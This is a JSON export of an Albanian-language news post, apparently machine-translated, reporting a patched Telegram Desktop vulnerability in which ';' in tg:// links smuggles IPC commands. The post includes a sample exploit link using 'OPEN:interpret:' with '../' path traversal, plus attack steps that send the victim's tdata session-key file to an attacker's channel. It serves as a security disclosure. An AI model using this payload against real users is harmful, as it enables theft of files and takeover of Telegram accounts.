{"id":183718,"date":"2026-10-09T10:54:03","date_gmt":"2026-10-09T08:54:03","guid":{"rendered":"https:\/\/prohoster.info\/blog\/news\/uyazvimost-v-telegram-desktop-pozvolyayushhaya-otpravit-proizvolnye-fajly-pri-klike-na-ssylku"},"modified":"2026-10-09T10:54:09","modified_gmt":"2026-10-09T08:54:09","slug":"telegram-desktop-vulnerability-allows-arbitrary-files-to-be-sent-when-a-link-is-clicked","status":"publish","type":"post","link":"https:\/\/prohoster.info\/sq\/blog\/news\/telegram-desktop-vulnerability-allows-arbitrary-files-to-be-sent-when-a-link-is-clicked","title":{"rendered":"Nj\u00eb vulnerabilitet n\u00eb Telegram Desktop, q\u00eb lejon d\u00ebrgimin e skedar\u00ebve t\u00eb arbitruesh\u00ebm me nj\u00eb klikim n\u00eb lidhje","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Detajet dhe metoda e shfryt\u00ebzimit t\u00eb dob\u00ebsis\u00eb (CVE-2026-107181) n\u00eb Telegram Desktop, klienti zyrtar i Telegram p\u00ebr sisteme desktop. Problemi shkaktohet nga mungesa e trajtimit t\u00eb duhur t\u00eb simboleve t\u00eb ndar\u00ebsve t\u00eb paekranuar n\u00eb komandat IPC, t\u00eb cilat lejonin q\u00eb me nj\u00eb klikim mbi lidhjen e d\u00ebrguar, t\u00eb mund t\u00eb organizohej transferimi i \u00e7do dosjeje nga sistemi i viktim\u00ebs te sulmuesi, p\u00ebrfshir\u00eb dosjet me \u00e7el\u00ebsat e sesionit, q\u00eb mund t\u00eb p\u00ebrdoren p\u00ebr t\u00eb kapur llogarin\u00eb n\u00eb Telegram. Dob\u00ebsia \u00ebsht\u00eb eliminuar n\u00eb versionin Telegram Desktop 7.2.9.<\/p>\n<p>Kur klikoni n\u00eb lidhjet \u00abtg:\/\/\u00bb, sistemi operativ aktivizon aplikacionin e lidhur me k\u00ebt\u00eb lloj lidhjeje, Telegram Desktop. N\u00ebse nj\u00eb instanc\u00eb tjet\u00ebr e k\u00ebtij aplikacioni \u00ebsht\u00eb e hapur n\u00eb sistem, procesi i hapur i d\u00ebrgon lidhjen p\u00ebrmes socket-it duke p\u00ebrdorur nd\u00ebrfaqen IPC. Problemi \u00ebsht\u00eb se, n\u00ebse p\u00ebrfshihet simbole \u00ab;\u00bb mes parametrave t\u00eb lidhjes (p\u00ebr shembull, \u00abtg:\/\/x?a=1;OPEN\u2026\u00bb), p\u00ebrmbajtja ndahen dhe pjes\u00ebt pas simbolit \u00ab;\u00bb trajtohen si komanda t\u00eb ve\u00e7anta.<\/p>\n<p>P\u00ebr t\u00eb kryer sulmin, aktivizohet komanda OPEN s\u00eb bashku me URI-n\u00eb \u00abinterpret:\u00bb, e cila \u00ebsht\u00eb projektuar p\u00ebr t\u00eb aktivizuar skriptet sh\u00ebrbyese p\u00ebrmes IPC, t\u00eb cilat jan\u00eb p\u00ebrdorur p\u00ebr d\u00ebrgimin automat t\u00eb versioneve t\u00eb reja n\u00eb kanale. Skripti p\u00ebrb\u00ebn nj\u00eb skedar lokal t\u00eb paracaktuar, n\u00eb t\u00eb cilin \u00ebsht\u00eb treguar skedari q\u00eb d\u00ebrgohet n\u00eb kanal dhe identifikatori i kanalit. Rruga e skedarit p\u00ebr skriptet p\u00ebrpunuar relativisht nga nj\u00eb n\u00ebn-katalog sh\u00ebrbimi, por p\u00ebr shkak t\u00eb munges\u00ebs s\u00eb pastrimit t\u00eb \u00ab..\/\u00bb n\u00eb rrug\u00ebt e skedar\u00ebve, sulmuesi ka mund\u00ebsin\u00eb q\u00eb t\u00eb aksesoj\u00eb skedar\u00ebt e ruajtur jasht\u00eb katalogut baz\u00eb. P\u00ebr shembull, mund t\u00eb ngarkohet nj\u00eb skedar n\u00eb grupin tuaj t\u00eb telegramit, pastaj duke iu referuar k\u00ebtij skedari si skript, duke p\u00ebrgatitur nj\u00eb lidhje t\u00eb till\u00eb:<\/p>\n<p>   tg:\/\/x?a=1;OPEN:interpret:..\/..\/..\/Downloads\/Telegram%20Desktop\/instructions.txt<\/p>\n<p>Hapat e realizimit t\u00eb sulmit:<\/p>\n<ul>\n<li class=\"l\"> Sulmuesi shton viktim\u00ebn n\u00eb grupin e tij (n\u00eb kufijt\u00eb e cil\u00ebsimeve t\u00eb zakonshme, shtimi nuk k\u00ebrkon konfirmim nga i shtuar) dhe d\u00ebrgon n\u00eb k\u00ebt\u00eb grup nj\u00eb dosje teksti, n\u00eb t\u00eb cil\u00ebn \u00ebsht\u00eb specifikuar kanali dhe rruga e skriptit. Telegram do ta ruaj\u00eb k\u00ebt\u00eb dosje n\u00eb nj\u00eb n\u00ebnkatalog t\u00eb paracaktuar sistemor kur viktima t\u00eb hyj\u00eb n\u00eb grup.\n<p>   kanali: 2005234537<br \/>\n   dosja: tdata\/D877F783D5D3EF8Cs<\/p>\n<li class=\"l\">Sulmuesi i d\u00ebrgon viktim\u00ebs nj\u00eb lidhje q\u00eb duket e pafajshme n\u00eb hostin e tij (p\u00ebr shembull, \u00abhttps:\/\/coolsite.org\u00bb), e cila kur hapet p\u00ebrmes ridrejtimit n\u00eb <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/sq\/server\/dts-dronten\/\"   title=\"server\" data-wpil-keyword-link=\"linked\">server<\/a> sulmuesin z\u00ebvend\u00ebsohet me nj\u00eb URI t\u00eb tipit \u2018tg:\/\/x?a=1;OPEN:interpret:\u2026;OPEN:interpret:\u2026\u2019\n<li class=\"l\"> Kur klikoni mbi lidhjen, shfletuesi th\u00ebrret trajtuesin e URI-s\u00eb \u2018tg:\/\/\u2019, i cili aktivizon zinxhirin e p\u00ebrmendur t\u00eb komandave, i cili \u00e7on n\u00eb d\u00ebrgimin e skedar\u00ebve n\u00eb kanal t\u00eb sulmuesit pa nxjerr\u00eb ndonj\u00eb njoftim dhe pa k\u00ebrkuar konfirmimin p\u00ebr d\u00ebrgim.\n<li class=\"l\"> Duke marr\u00eb skedar\u00ebt nga n\u00ebnkatalogu tdata me \u00e7el\u00ebsat e enkriptimit dhe autorizimit, n\u00eb munges\u00eb t\u00eb nj\u00eb kode lokal t\u00eb vendosur nga p\u00ebrdoruesi, sulmuesi mund t\u00eb klonoj\u00eb seanc\u00ebn e lidhjes s\u00eb viktim\u00ebs n\u00eb pajisjen e tij.\n<\/ul>\n<p>Burimi: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=66431\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438 \u043c\u0435\u0442\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (CVE-2026-107181) \u0432 Telegram Desktop, \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u0435 Telegram \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435\u043c \u0434\u043e\u043b\u0436\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043d\u0435\u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432-\u0440\u0430\u0437\u0434\u0435\u043b\u0438\u0442\u0435\u043b\u0435\u0439 \u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u0445 IPC, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u043e \u043f\u0440\u0438 \u043a\u043b\u0438\u043a\u0435 \u043d\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u043b\u044e\u0431\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0436\u0435\u0440\u0442\u0432\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0444\u0430\u0439\u043b\u044b \u0441 \u0441\u0435\u0441\u0441\u0438\u043e\u043d\u043d\u044b\u043c\u0438 \u043a\u043b\u044e\u0447\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 Telegram. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":10,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-183718","post","type-post","status-publish","format-standard","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.3 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438 \u043c\u0435\u0442\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (CVE-2026-107181) \u0432 Telegram Desktop, \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u0435 Telegram \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Alexander Kovalev\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/sq\/blog\/news\/telegram-desktop-vulnerability-allows-arbitrary-files-to-be-sent-when-a-link-is-clicked\" \/>\n\t\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.3\" \/>\n\t\t<meta property=\"og:locale\" content=\"sq_AL\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Telegram Desktop, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043f\u0440\u0438 \u043a\u043b\u0438\u043a\u0435 \u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0443 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438 \u043c\u0435\u0442\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (CVE-2026-107181) \u0432 Telegram Desktop, \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u0435 Telegram \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/sq\/blog\/news\/telegram-desktop-vulnerability-allows-arbitrary-files-to-be-sent-when-a-link-is-clicked\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2026-10-09T08:54:03+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-10-09T08:54:09+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Dob\u00ebsia n\u00eb Telegram Desktop, e cila lejon d\u00ebrgimin e skedar\u00ebve t\u00eb rast\u00ebsish\u00ebm me nj\u00eb klikim n\u00eb link | ProHoster","description":"U zbuluan detajet dhe metodat e shfryt\u00ebzimit t\u00eb dob\u00ebsis\u00eb (CVE-2026-107181) n\u00eb Telegram Desktop, klienti zyrtar i Telegram p\u00ebr sisteme desktop.","canonical_url":"https:\/\/prohoster.info\/sq\/blog\/news\/telegram-desktop-vulnerability-allows-arbitrary-files-to-be-sent-when-a-link-is-clicked","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"sq_AL","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Telegram Desktop, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043f\u0440\u0438 \u043a\u043b\u0438\u043a\u0435 \u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0443 | ProHoster","og:description":"\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438 \u043c\u0435\u0442\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (CVE-2026-107181) \u0432 Telegram Desktop, \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u0435 Telegram \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.","og:url":"https:\/\/prohoster.info\/sq\/blog\/news\/telegram-desktop-vulnerability-allows-arbitrary-files-to-be-sent-when-a-link-is-clicked","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2026-10-09T08:54:03+00:00","article:modified_time":"2026-10-09T08:54:09+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":[],"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/183718","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/users\/10"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/comments?post=183718"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/183718\/revisions"}],"predecessor-version":[{"id":183719,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/183718\/revisions\/183719"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/media?parent=183718"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/categories?post=183718"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/tags?post=183718"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}